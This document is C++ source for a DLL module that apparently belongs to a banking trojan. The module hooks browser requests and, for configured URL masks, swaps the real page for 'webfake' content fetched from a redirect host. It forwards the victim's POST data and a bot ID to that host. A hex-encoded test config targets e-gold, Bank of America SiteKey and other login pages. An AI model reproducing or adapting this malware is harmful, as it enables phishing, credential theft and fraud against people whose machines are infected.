#include "includes.h"

#include "debug.cpp"
#include "debugmem.cpp"
#include "nomoremsvcrt\nomoremsvcrt.cpp"

#include "settings.h"

#include "dropper\config.h"
TDropperConfig dc;

CHAR gl_szBotName[sizeof(dc.szBotGuid)] = {0};

#include "str\str.h"

typedef VOID (*FREEMEM)(IN LPVOID lpMem);
FREEMEM gl_FreeMem = NULL;

// ~~~

struct WebfakesConfig
{
	PCHAR szUrlMask;
	PCHAR szUrlRedirect;
	PCHAR szFlags, szPostBlackMask, szPostWhiteMask, szBlockUrl, szWebFakeName, szUnBlockUrl;
	
	PBYTE pbFakeContent;
	DWORD dwFakeContentSize;

	BOOL isBlocked;

	LIST_ENTRY _p;
};
typedef WebfakesConfig *PWebfakesConfig;
#define GetWebfakesConfigBuffer(ListEntryAddress) (PWebfakesConfig)((PBYTE)ListEntryAddress - (sizeof(WebfakesConfig) - sizeof(LIST_ENTRY)));

class CWebfakesConfig
{
public:
	PLIST_ENTRY m_plWebfakesConfig;
	CWebfakesConfig()
	{
		m_plWebfakesConfig = NULL;
	}
	bool AddField(IN PCHAR szUrlMask, IN PCHAR szUrlRedirect, IN PCHAR szFlags, IN PCHAR szPostBlackMask, IN PCHAR szPostWhiteMask, IN PCHAR szBlockUrl, IN PCHAR szWebFakeName, IN PCHAR szUnBlockUrl);
	void FreeAll();
	PWebfakesConfig CWebfakesConfig::FindWebfake(IN PCHAR szUrl, IN PCHAR szVerb, IN PCHAR szPostVars);
};

bool CWebfakesConfig::AddField(IN PCHAR szUrlMask, IN PCHAR szUrlRedirect, IN PCHAR szFlags, IN PCHAR szPostBlackMask, IN PCHAR szPostWhiteMask, IN PCHAR szBlockUrl, IN PCHAR szWebFakeName, IN PCHAR szUnBlockUrl)
{
	PWebfakesConfig wcTmp				=	NULL;
	DWORD dwValueSize;

	do
	{
		wcTmp = (PWebfakesConfig)malloc(sizeof(WebfakesConfig));
		if (!wcTmp)
			break;
		ZeroMemory(wcTmp, sizeof(WebfakesConfig));
		// szUrlMask
		dwValueSize = (DWORD)strlen(szUrlMask);
		if ( !(wcTmp->szUrlMask = (PCHAR)malloc(dwValueSize + 1)) )
			break;
		strcpy(wcTmp->szUrlMask, szUrlMask);
		// szUrlRedirect
		dwValueSize = (DWORD)strlen(szUrlRedirect);
		if ( !(wcTmp->szUrlRedirect = (PCHAR)malloc(dwValueSize + 1)) )
			break;
		strcpy(wcTmp->szUrlRedirect, szUrlRedirect);
		// szFlags
		if (szFlags) {
			dwValueSize = (DWORD)strlen(szFlags);
			if ( !(wcTmp->szFlags = (PCHAR)malloc(dwValueSize + 1)) )
				break;
			strcpy(wcTmp->szFlags, szFlags);
		}
		// szPostBlackMask
		if (szPostBlackMask && strlen(szPostBlackMask)) {
			dwValueSize = (DWORD)strlen(szPostBlackMask);
			if ( !(wcTmp->szPostBlackMask = (PCHAR)malloc(dwValueSize + 1)) )
				break;
			strcpy(wcTmp->szPostBlackMask, szPostBlackMask);
		}
		// szPostWhiteMask
		if (szPostWhiteMask && strlen(szPostWhiteMask)) {
			dwValueSize = (DWORD)strlen(szPostWhiteMask);
			if ( !(wcTmp->szPostWhiteMask = (PCHAR)malloc(dwValueSize + 1)) )
				break;
			strcpy(wcTmp->szPostWhiteMask, szPostWhiteMask);
			wcTmp->isBlocked = TRUE;
		}
		// szBlockUrl
		if (szBlockUrl) {
			dwValueSize = (DWORD)strlen(szBlockUrl);
			if ( !(wcTmp->szBlockUrl = (PCHAR)malloc(dwValueSize + 1)) )
				break;
			strcpy(wcTmp->szBlockUrl, szBlockUrl);
		}
		// szWebFakeName
		if (szWebFakeName) {
			dwValueSize = (DWORD)strlen(szBlockUrl);
			if ( !(wcTmp->szWebFakeName = (PCHAR)malloc(dwValueSize + 1)) )
				break;
			strcpy(wcTmp->szWebFakeName, szWebFakeName);
		}
		// szUnBlockUrl
		if (szUnBlockUrl) {
			dwValueSize = (DWORD)strlen(szUnBlockUrl);
			if ( !(wcTmp->szUnBlockUrl = (PCHAR)malloc(dwValueSize + 1)) )
				break;
			strcpy(wcTmp->szUnBlockUrl, szUnBlockUrl);
		}
		// ~~~
		if (!m_plWebfakesConfig)  {
			m_plWebfakesConfig = &wcTmp->_p;
			InitializeListHead(m_plWebfakesConfig);
		}
		else {
			InsertHeadList(m_plWebfakesConfig->Blink, &wcTmp->_p);
		}
		return true;
	}
	while (FALSE);

	if (wcTmp) {
		free(wcTmp->szUrlMask);
		free(wcTmp->szUrlRedirect);
		free(wcTmp->szFlags);
		free(wcTmp->szPostBlackMask);
		free(wcTmp->szPostWhiteMask);
		free(wcTmp->szBlockUrl);
		free(wcTmp->szWebFakeName);
		free(wcTmp->szUnBlockUrl);
	}
	free(wcTmp);
	return false;
}

void CWebfakesConfig::FreeAll()
{
	if (!m_plWebfakesConfig)
		return;
	PWebfakesConfig pCurrent = NULL;

	for ( ; !IsListEmpty(m_plWebfakesConfig); free(pCurrent))
	{
		pCurrent = GetWebfakesConfigBuffer(m_plWebfakesConfig->Blink);
		free(pCurrent->szUrlMask);
		free(pCurrent->szUrlRedirect);
		free(pCurrent->szFlags);
		free(pCurrent->szPostBlackMask);
		free(pCurrent->szPostWhiteMask);
		free(pCurrent->szBlockUrl);
		free(pCurrent->szWebFakeName);
		free(pCurrent->szUnBlockUrl);
		RemoveTailList(m_plWebfakesConfig);
	}
	if (!pCurrent)
		return;
	pCurrent = GetWebfakesConfigBuffer(m_plWebfakesConfig);
	free(pCurrent->szUrlMask);
	free(pCurrent->szUrlRedirect);
	free(pCurrent->szFlags);
	free(pCurrent->szPostBlackMask);
	free(pCurrent->szPostWhiteMask);
	free(pCurrent->szBlockUrl);
	free(pCurrent->szWebFakeName);
	free(pCurrent->szUnBlockUrl);
	free(pCurrent);
}

PWebfakesConfig CWebfakesConfig::FindWebfake(IN PCHAR szUrl, IN PCHAR szVerb, IN PCHAR szPostVars)
{
	if (!m_plWebfakesConfig || !szUrl)
		return false;
	PWebfakesConfig pCurrent = NULL;

	INT i = 0;
	for ( PLIST_ENTRY plTmp = m_plWebfakesConfig; plTmp != m_plWebfakesConfig || !i; plTmp = plTmp->Flink, i++ )
	{
		pCurrent = GetWebfakesConfigBuffer(plTmp);

		// HTTP 404 on webfake? Lets ignore it
		if (!pCurrent->szUrlMask)
		{
			DebugWrite("[WARNING] : HTTP 404 on webfake? Lets ignore it");
			continue;
		}

		// Checking for block Url
		if (!pCurrent->isBlocked && pCurrent->szBlockUrl && strcmpmask(szUrl, pCurrent->szBlockUrl))
		{
			pCurrent->isBlocked = TRUE;
			DebugWrite("[DEBUG] : Block Url Mask { %s } is detected here { %s }", pCurrent->szBlockUrl, szUrl);
			//continue;
		}

		// Checking for unblock Url
		if (pCurrent->isBlocked && pCurrent->szUnBlockUrl && strcmpmask(szUrl, pCurrent->szUnBlockUrl))
		{
			pCurrent->isBlocked = FALSE;
			DebugWrite("[DEBUG] : UnBlock Url Mask { %s } is detected here { %s }", pCurrent->szUnBlockUrl, szUrl);
			//continue;
		}

		// Checking Url
		DebugWrite("[DEBUG] : strcmpmask(\"%s\", \"%s\") == %s", szUrl, pCurrent->szUrlMask, strcmpmask(szUrl, pCurrent->szUrlMask) ? "TRUE" : "FALSE");
		if (strcmpmask(szUrl, pCurrent->szUrlMask))
		{
			// Checking black&white masks of post data
			if (szPostVars && strlen(szPostVars))
			{
				if (!pCurrent->isBlocked && pCurrent->szPostBlackMask)
				{
					if ( strcmpmask(szPostVars, pCurrent->szPostBlackMask) )
					{
						pCurrent->isBlocked = TRUE;
						DebugWrite("[DEBUG] : Post Blocked Mask { %s } is detected here { %s }", pCurrent->szPostBlackMask, szPostVars);
						continue;
					}
				}
				if (pCurrent->isBlocked && pCurrent->szPostWhiteMask)
				{
					if ( !strcmpmask(szPostVars, pCurrent->szPostWhiteMask) )
					{
						DebugWrite("[DEBUG] : Current webfake { %s } is blocked now", pCurrent->szUrlMask);
						continue;
					}
					pCurrent->isBlocked = FALSE;
					DebugWrite("[DEBUG] : Post White Mask { %s } is detected here { %s }", pCurrent->szPostWhiteMask, szPostVars);
				}
			}
			else
			{
				if (pCurrent->isBlocked)
				{
					DebugWrite("[DEBUG] : Current webfake { %s } is blocked now (2)", pCurrent->szUrlMask);
					continue;
				}
			}

			// Checking Verb
			if (szVerb && pCurrent->szFlags)
			{
				if ( ( StrStr(pCurrent->szFlags, "G") && szVerb[0] == 'G' )
				||   ( StrStr(pCurrent->szFlags, "P") && szVerb[0] == 'P' )
				   )
					return pCurrent;
				else
					return NULL;
			}
			return pCurrent;
		}
	}

	return NULL;
}

CWebfakesConfig wc;

// ~~~

BOOL APIENTRY DllMain(IN HINSTANCE hDllHandle, IN DWORD nReason, IN LPVOID Reserved)
{
	switch (nReason)
	{
	case DLL_PROCESS_ATTACH:
		break;
	}
    return TRUE;
}

//#define WEBFAKES_DIV	'|'

PCHAR Parser_GotoNextLine(IN PCHAR szSrc)
{
	for (; szSrc[0] != '\0'; szSrc++)
		if (szSrc[0] == '\n')
			return ++szSrc;
	return NULL;
}

DLLEXPORT bool Init(char *szConfig)
{
	if (!szConfig)
		return false;

	DWORD dwLength = strlen(szConfig);
	PCHAR szBuffer = (PCHAR)malloc(dwLength + 1);
	if (!szBuffer)
		return false;
	strcpy(szBuffer, szConfig);

	//PCHAR szStr1 = szBuffer;
	//PCHAR szStr2 = NULL;
	//for (INT i = 0; i < (INT)dwLength; i++)
	//{
	//	CHAR c = szBuffer[i];
	//	if ( c == WEBFAKES_DIV || c == '\r' || c == '\n' )
	//	{
	//		szBuffer[i] = '\0';
	//		if (c != WEBFAKES_DIV)
	//		{
	//			szStr2 = szStr1 + strlen(szStr1) + 1 * sizeof(CHAR);
	//			// Adding new entry
	//			wc.AddField(szStr1, szStr2);
	//			szStr1 = szBuffer + i + 1 * sizeof(CHAR);
	//		}
	//		if (szBuffer[i + 1] == '\n') {
	//			i++;
	//			szStr1++;
	//		}
	//	}
	//}

	do
	{
		// Vars
		CHAR szWebFakes[] = "entry \"WebFakes\"";
		PCHAR szPos;
		PCHAR szNextLine;
		PCHAR szOptionStringPnt;
		PCHAR szOptionStringPntEnd;
		DWORD dwOptionStringType;
		// WebFakes options vars
		PCHAR szOptionStrings[8] = {0};
		// Finding { entry "WebFakes" }
		szPos = StrStr(szBuffer, szWebFakes);
		if (!szPos) {
			DebugWrite("[ERROR] : Cannot find \"%s\" section", szWebFakes);
			break;
		}
		szPos += sizeof(szWebFakes) - 1;
		// Next line
		if (!(szPos = Parser_GotoNextLine(szPos))) {
			DebugWrite("[ERROR] : Cannot find next line");
			break;
		}
		// Finding webfake options
		for (; szPos && szPos[0] != '\0'; szPos++)
		{
			// Comment
			if (szPos[0] == ';') {
				DebugWrite("[DEBUG] : Skipping comment stuff");
				szPos = Parser_GotoNextLine(szPos);
				continue;
			}
			// Line with options
			if (szPos[0] == '"')
			{
				szNextLine = Parser_GotoNextLine(szPos);
				if (!szNextLine) {
					DebugWrite("[ERROR] : Cannot find next line");
					break;
				}
				dwOptionStringType = 0;
				for (; szPos && szPos[0] != '\0' && szPos != szNextLine && dwOptionStringType < sizeof(szOptionStrings); szPos++)
				{
					if (szPos[0] == '"')
					{
						szOptionStringPnt = szPos + 1;
						// Finding end of option string
						szOptionStringPntEnd = StrStr(szOptionStringPnt, "\"");
						if (!szOptionStringPntEnd) {
							DebugWrite("[ERROR] : Cannot find end of string");
							szPos = Parser_GotoNextLine(szPos);
							break;
						}
						// Push this string into special array
						szOptionStrings[dwOptionStringType++] = szOptionStringPnt;
						szOptionStringPntEnd[0] = '\0';
						// Searching for next option string
						szPos += (szOptionStringPntEnd - szOptionStringPnt) + 1;
						szOptionStringPnt = NULL;
					}
				}
				szPos--;
				// Adding new webfake
				wc.AddField(szOptionStrings[0], szOptionStrings[1], szOptionStrings[2], szOptionStrings[3], szOptionStrings[4], szOptionStrings[5], szOptionStrings[6], szOptionStrings[7]);
				// Clearing special array
				ZeroMemory(szOptionStrings, sizeof(szOptionStrings));
			}
		}

	}
	while (FALSE);
	
	free(szBuffer);

	return true;
}

DLLEXPORT bool Start()
{
	return true;
}


DLLEXPORT bool Stop()
{
	wc.FreeAll();
	return true;
}

DLLEXPORT BOOL IsGlobal() { return TRUE; }

typedef BOOL (__cdecl *GETPAGE2)(IN PCHAR szUrl, IN PCHAR szVerb, IN PCHAR szRequestHeaders, IN BOOL bReadResponseHeaders, IN LPVOID lpOptional, DWORD dwOptionalLength, OUT PBYTE *pbData, OUT PDWORD dwSize);
GETPAGE2 gl_lpGetPage2 = NULL;

DLLEXPORT void TakeGetPage2(LPVOID lpFunc)
{
	gl_lpGetPage2 = (GETPAGE2)lpFunc;
}

// ~~~

DWORD RemoveHttpValue(IN PCHAR szHeader, IN DWORD HttpHeaderSize, IN PCHAR szHttpValue, OUT PCHAR *szNewBuf)
{
	PCHAR szHeaderTmp = (PCHAR)malloc(HttpHeaderSize + 1);
	if (!szHeaderTmp)
		return 0;
	CopyMemory(szHeaderTmp, szHeader, HttpHeaderSize);
	szHeaderTmp[HttpHeaderSize] = '\0';

	PCHAR szPosCutOff = StrStrI(szHeaderTmp, szHttpValue);
	DWORD dwNewSize = 0;
	if (szPosCutOff)
	{
		PCHAR szPosBefore = szPosCutOff - 2;
		PCHAR szPosAfter = szPosCutOff + strlen(szHttpValue);
		DWORD dwDiff = 0;
		if (szPosBefore < szHeaderTmp) {
			dwDiff = szHeaderTmp - szPosBefore;
			szPosBefore = szHeaderTmp;
		}
		DWORD i = (szPosAfter - szHeaderTmp);
		for (; i < HttpHeaderSize && (szPosAfter[0] != 0x0A && szPosAfter[0] != 0x0D); szPosAfter++, i++);
		szPosAfter += dwDiff;
		i += dwDiff;
		if (i != HttpHeaderSize)
		{
			DWORD dwBeforeSize = (DWORD)szPosBefore - (DWORD)szHeaderTmp;
			DWORD dwCutSize = (DWORD)szPosAfter - (DWORD)szPosBefore;
			DWORD dwAfterSize = HttpHeaderSize - (dwBeforeSize + dwCutSize);
			dwNewSize = dwBeforeSize + dwAfterSize;
			*szNewBuf = (PCHAR)malloc(dwNewSize + 1);
			if (!*szNewBuf) {
				free(szHeaderTmp);
				return 0;
			}
			ZeroMemory(*szNewBuf, dwNewSize + 1);
			CopyMemory(*szNewBuf, szHeaderTmp, dwBeforeSize);
			CopyMemory(*szNewBuf + dwBeforeSize, szPosAfter, dwAfterSize);
			HttpHeaderSize = dwNewSize;
			DebugWrite("[ %s ]\nHttpHeaderSize == %d; dwCutSize == %d; dwNewSize = %d \r\n{ %s }", szHttpValue, HttpHeaderSize, dwCutSize, dwNewSize, *szNewBuf);
		}
	}

	free(szHeaderTmp);

	return dwNewSize;
}

// ~~~

DLLEXPORT void Callback_OnBeforeProcessUrl(IN PCHAR szUrl, IN PCHAR szVerb, IN PCHAR szHeaders, IN PCHAR szPostVars, OUT PDWORD lpdwProcessMode)
{
	DWORD dwNewSize;

	if (!szUrl || !szHeaders)
		return;
	DebugWrite("[DEBUG] : szUrl == { %s }; szVerb == { %s }; szPostVars == { %s }; szHeaders = \n{ %s }", szUrl, szVerb, szPostVars, szHeaders);
	PWebfakesConfig pCurrent = wc.FindWebfake(szUrl, szVerb, szPostVars);
	if (pCurrent && gl_lpGetPage2)
	{
		if ( !strcmp(pCurrent->szUrlRedirect, "about:blank") )
		{
			//HTTP/1.1 200 OK
			//Server: nginx
			//Connection: close
			//Cache-control: no-cache
			//Content-Length: 38
			//
			//<html><title>Blank Page</title></html>
			unsigned char blank[136] = {
				0x48, 0x54, 0x54, 0x50, 0x2F, 0x31, 0x2E, 0x31, 0x20, 0x32, 0x30, 0x30, 0x20, 0x4F, 0x4B, 0x0D, 
				0x0A, 0x53, 0x65, 0x72, 0x76, 0x65, 0x72, 0x3A, 0x20, 0x6E, 0x67, 0x69, 0x6E, 0x78, 0x0D, 0x0A, 
				0x43, 0x6F, 0x6E, 0x6E, 0x65, 0x63, 0x74, 0x69, 0x6F, 0x6E, 0x3A, 0x20, 0x63, 0x6C, 0x6F, 0x73, 
				0x65, 0x0D, 0x0A, 0x43, 0x61, 0x63, 0x68, 0x65, 0x2D, 0x63, 0x6F, 0x6E, 0x74, 0x72, 0x6F, 0x6C, 
				0x3A, 0x20, 0x6E, 0x6F, 0x2D, 0x63, 0x61, 0x63, 0x68, 0x65, 0x0D, 0x0A, 0x43, 0x6F, 0x6E, 0x74, 
				0x65, 0x6E, 0x74, 0x2D, 0x4C, 0x65, 0x6E, 0x67, 0x74, 0x68, 0x3A, 0x20, 0x33, 0x38, 0x0D, 0x0A, 
				0x0D, 0x0A, 0x3C, 0x68, 0x74, 0x6D, 0x6C, 0x3E, 0x3C, 0x74, 0x69, 0x74, 0x6C, 0x65, 0x3E, 0x42, 
				0x6C, 0x61, 0x6E, 0x6B, 0x20, 0x50, 0x61, 0x67, 0x65, 0x3C, 0x2F, 0x74, 0x69, 0x74, 0x6C, 0x65, 
				0x3E, 0x3C, 0x2F, 0x68, 0x74, 0x6D, 0x6C, 0x3E
			};
			// FIXME: memory manager
			pCurrent->pbFakeContent = (PBYTE)malloc(sizeof(blank) + 1);
			if (pCurrent->pbFakeContent)
			{
				CopyMemory(pCurrent->pbFakeContent, blank, sizeof(blank));
				pCurrent->pbFakeContent[sizeof(blank)] = '\0';
				pCurrent->dwFakeContentSize = sizeof(blank);
				*lpdwProcessMode = 1;
			}
		}
		else
		{
			DWORD dwHeadersLength = 0;
			dwHeadersLength = strlen(szHeaders);
			CHAR szLastOne[1000];
			PCHAR szRequestHeaders = (PCHAR)malloc(dwHeadersLength + sizeof(szLastOne));
			if (!szRequestHeaders)
				return;
			ZeroMemory(szRequestHeaders, dwHeadersLength + sizeof(szLastOne));
			_snprintf(szLastOne, sizeof(szLastOne) - 1, "BG: %s\r\nREF: %s\r\n", gl_szBotName, szUrl);
			szLastOne[sizeof(szLastOne) - 1] = '\0';
			CopyMemory(szRequestHeaders, szHeaders, dwHeadersLength);
			if ( StrStr(pCurrent->szFlags, "A") )
			{
				DebugWrite("[DEBUG] : Adding additional headers { %s }", szLastOne);
				CopyMemory(szRequestHeaders + ((dwHeadersLength >= 2) ? dwHeadersLength - 2 : 0), szLastOne, strlen(szLastOne));
			}
			dwHeadersLength = strlen(szRequestHeaders);

			// Cutting off useless request headers
			dwNewSize = RemoveHttpValue(szRequestHeaders, dwHeadersLength, "GET /", (PCHAR *)&szRequestHeaders);
			if (dwNewSize) dwHeadersLength = dwNewSize;
			dwNewSize = RemoveHttpValue(szRequestHeaders, dwHeadersLength, "POST /", (PCHAR *)&szRequestHeaders);
			if (dwNewSize) dwHeadersLength = dwNewSize;
			dwNewSize = RemoveHttpValue(szRequestHeaders, dwHeadersLength, "Host:", (PCHAR *)&szRequestHeaders);
			if (dwNewSize) dwHeadersLength = dwNewSize;
			dwNewSize = RemoveHttpValue(szRequestHeaders, dwHeadersLength, "Accept:", (PCHAR *)&szRequestHeaders);
			if (dwNewSize) dwHeadersLength = dwNewSize;
			dwNewSize = RemoveHttpValue(szRequestHeaders, dwHeadersLength, "Accept-Language:", (PCHAR *)&szRequestHeaders);
			if (dwNewSize) dwHeadersLength = dwNewSize;
			dwNewSize = RemoveHttpValue(szRequestHeaders, dwHeadersLength, "Accept-Encoding:", (PCHAR *)&szRequestHeaders);
			if (dwNewSize) dwHeadersLength = dwNewSize;
			dwNewSize = RemoveHttpValue(szRequestHeaders, dwHeadersLength, "Accept-Charset:", (PCHAR *)&szRequestHeaders);
			if (dwNewSize) dwHeadersLength = dwNewSize;
			dwNewSize = RemoveHttpValue(szRequestHeaders, dwHeadersLength, "Connection:", (PCHAR *)&szRequestHeaders);
			if (dwNewSize) dwHeadersLength = dwNewSize;
			dwNewSize = RemoveHttpValue(szRequestHeaders, dwHeadersLength, "Cookie:", (PCHAR *)&szRequestHeaders);
			if (dwNewSize) dwHeadersLength = dwNewSize;
			dwNewSize = RemoveHttpValue(szRequestHeaders, dwHeadersLength, "Content-Length:", (PCHAR *)&szRequestHeaders);
			if (dwNewSize) dwHeadersLength = dwNewSize;

			if (gl_lpGetPage2(pCurrent->szUrlRedirect, szVerb, szRequestHeaders, TRUE, szPostVars, strlen(szPostVars), &pCurrent->pbFakeContent, &pCurrent->dwFakeContentSize))
			{
				// HTTP/1.1 404 Not Found
				if ( (pCurrent->dwFakeContentSize > 12) && !memcmp(pCurrent->pbFakeContent + 9, "404", 3) )
				{
					DebugWrite("[WARNING] : HTTP 404 : { %s }\n{ %s }", pCurrent->szUrlRedirect, pCurrent->pbFakeContent);
					free(pCurrent->szUrlMask);
					pCurrent->szUrlMask = NULL;
					pCurrent->dwFakeContentSize = 0;
					gl_FreeMem(pCurrent->pbFakeContent);
					free(szRequestHeaders);
					return;
				}
				// Cutting off useless response headers in case if this is IE
				if (GetModuleHandle("nspr4.dll") == NULL)
				{
					dwNewSize = RemoveHttpValue((PCHAR)pCurrent->pbFakeContent, pCurrent->dwFakeContentSize, "Transfer-Encoding:", (PCHAR *)&pCurrent->pbFakeContent);
					if (dwNewSize) pCurrent->dwFakeContentSize = dwNewSize;
					dwNewSize = RemoveHttpValue((PCHAR)pCurrent->pbFakeContent, pCurrent->dwFakeContentSize, "Content-Encoding:", (PCHAR *)&pCurrent->pbFakeContent);
					if (dwNewSize) pCurrent->dwFakeContentSize = dwNewSize;
				}

				*lpdwProcessMode = 1;
			}
			else
			{
				DebugWrite("[ERROR] : Cannot read page for some reason");
			}

			free(szRequestHeaders);

		}
	}
	else
	{
		if (!gl_lpGetPage2)
			DebugWrite("[WARNING] : gl_lpGetPage2 is NULL ?");
	}
	DebugLeave("");
}

DLLEXPORT void Callback_OnBeforeLoadPage3(IN PCHAR szUrl, IN PCHAR szVerb, IN PCHAR szHeaders, IN PCHAR szPostVars, OUT PCHAR * lpszContent, OUT PDWORD lpdwSize)
{
	DebugWrite("[DEBUG] : szUrl == { %s }", szUrl);

	PWebfakesConfig pCurrent = wc.FindWebfake(szUrl, szVerb, szPostVars);
	if ( !pCurrent || !pCurrent->dwFakeContentSize )
		return;

	*lpszContent = (PCHAR)malloc(pCurrent->dwFakeContentSize);
	if (!*lpszContent) {
		DebugWrite("[ERROR] : Ahtung! : *lpszContent == NULL");
		return;
	}
	if (!pCurrent->pbFakeContent) {
		DebugWrite("[ERROR] : Ahtung! : pCurrent->pbFakeContent == NULL");
		return;
	}
	CopyMemory(*lpszContent, pCurrent->pbFakeContent, pCurrent->dwFakeContentSize);
	*lpdwSize = pCurrent->dwFakeContentSize;

	pCurrent->dwFakeContentSize = 0;
	if (gl_FreeMem) {
		gl_FreeMem(pCurrent->pbFakeContent);
		pCurrent->pbFakeContent = NULL;
	}
}

#ifdef NDEBUG
DLLEXPORT void FreeMem(LPVOID lpMem)
{
	free(lpMem);
}
#endif

#define BOT_MIN_NAME			7

DLLEXPORT VOID TakeBotGuid(PCHAR szBotGuid)
{
	_strcpy_s(gl_szBotName, sizeof(gl_szBotName), szBotGuid);
}

DLLEXPORT void TakeFreeMem(LPVOID lpFreeMemFunc)
{
	gl_FreeMem = (FREEMEM)lpFreeMemFunc;
}


#ifndef NDEBUG

unsigned char data[387] = {
	0x65, 0x6E, 0x74, 0x72, 0x79, 0x20, 0x22, 0x57, 0x65, 0x62, 0x46, 0x61, 0x6B, 0x65, 0x73, 0x22, 
	0x0D, 0x0A, 0x22, 0x68, 0x74, 0x74, 0x70, 0x73, 0x3A, 0x2F, 0x2F, 0x2A, 0x65, 0x2D, 0x67, 0x6F, 
	0x6C, 0x64, 0x2A, 0x2F, 0x61, 0x63, 0x63, 0x74, 0x2F, 0x6C, 0x6F, 0x67, 0x69, 0x6E, 0x2E, 0x68, 
	0x74, 0x6D, 0x6C, 0x22, 0x20, 0x22, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x66, 0x6F, 0x72, 
	0x74, 0x75, 0x73, 0x68, 0x6B, 0x61, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x72, 0x61, 0x64, 0x75, 0x67, 
	0x61, 0x2F, 0x69, 0x6E, 0x64, 0x65, 0x78, 0x2E, 0x68, 0x74, 0x6D, 0x6C, 0x22, 0x20, 0x22, 0x47, 
	0x50, 0x41, 0x22, 0x20, 0x22, 0x22, 0x20, 0x22, 0x22, 0x0D, 0x0A, 0x22, 0x68, 0x74, 0x74, 0x70, 
	0x3A, 0x2F, 0x2F, 0x6D, 0x69, 0x63, 0x72, 0x6F, 0x73, 0x6F, 0x66, 0x74, 0x2E, 0x63, 0x6F, 0x6D, 
	0x2F, 0x64, 0x61, 0x74, 0x61, 0x2F, 0x69, 0x6D, 0x61, 0x67, 0x65, 0x2F, 0x77, 0x61, 0x69, 0x74, 
	0x2E, 0x67, 0x69, 0x66, 0x22, 0x20, 0x22, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x66, 0x6F, 
	0x72, 0x74, 0x75, 0x73, 0x68, 0x6B, 0x61, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x69, 0x6D, 0x61, 0x67, 
	0x65, 0x73, 0x2F, 0x77, 0x61, 0x69, 0x74, 0x2E, 0x67, 0x69, 0x66, 0x22, 0x20, 0x22, 0x47, 0x50, 
	0x41, 0x22, 0x20, 0x22, 0x22, 0x20, 0x22, 0x22, 0x0D, 0x0A, 0x22, 0x68, 0x74, 0x74, 0x70, 0x73, 
	0x3A, 0x2F, 0x2F, 0x2A, 0x2F, 0x73, 0x61, 0x73, 0x2F, 0x73, 0x69, 0x67, 0x6E, 0x6F, 0x6E, 0x2E, 
	0x64, 0x6F, 0x2A, 0x22, 0x20, 0x22, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x72, 0x61, 0x6D, 
	0x62, 0x6C, 0x65, 0x72, 0x2E, 0x72, 0x75, 0x22, 0x20, 0x22, 0x47, 0x50, 0x41, 0x22, 0x20, 0x22, 
	0x22, 0x20, 0x22, 0x22, 0x0D, 0x0A, 0x22, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x6D, 0x61, 
	0x69, 0x6C, 0x2E, 0x72, 0x75, 0x2F, 0x22, 0x20, 0x22, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 
	0x75, 0x61, 0x2E, 0x66, 0x6D, 0x22, 0x20, 0x22, 0x47, 0x50, 0x41, 0x22, 0x20, 0x22, 0x22, 0x20, 
	0x22, 0x22, 0x0D, 0x0A, 0x22, 0x68, 0x74, 0x74, 0x70, 0x73, 0x3A, 0x2F, 0x2F, 0x73, 0x69, 0x74, 
	0x65, 0x6B, 0x65, 0x79, 0x2E, 0x62, 0x61, 0x6E, 0x6B, 0x6F, 0x66, 0x61, 0x6D, 0x65, 0x72, 0x69, 
	0x63, 0x61, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x22, 0x20, 0x22, 0x68, 0x74, 0x74, 0x70, 0x73, 0x3A, 
	0x2F, 0x2F, 0x77, 0x77, 0x77, 0x2E, 0x67, 0x6F, 0x6F, 0x67, 0x6C, 0x65, 0x2E, 0x63, 0x6F, 0x6D, 
	0x22, 0x20, 0x22, 0x47, 0x50, 0x41, 0x22, 0x20, 0x22, 0x22, 0x20, 0x22, 0x22, 0x0D, 0x0A, 0x65, 
	0x6E, 0x64, 0x00
};

DLLEXPORT void DebugInit()
{
	Init((PCHAR)data);
	Sleep(INFINITE);
}
#endif
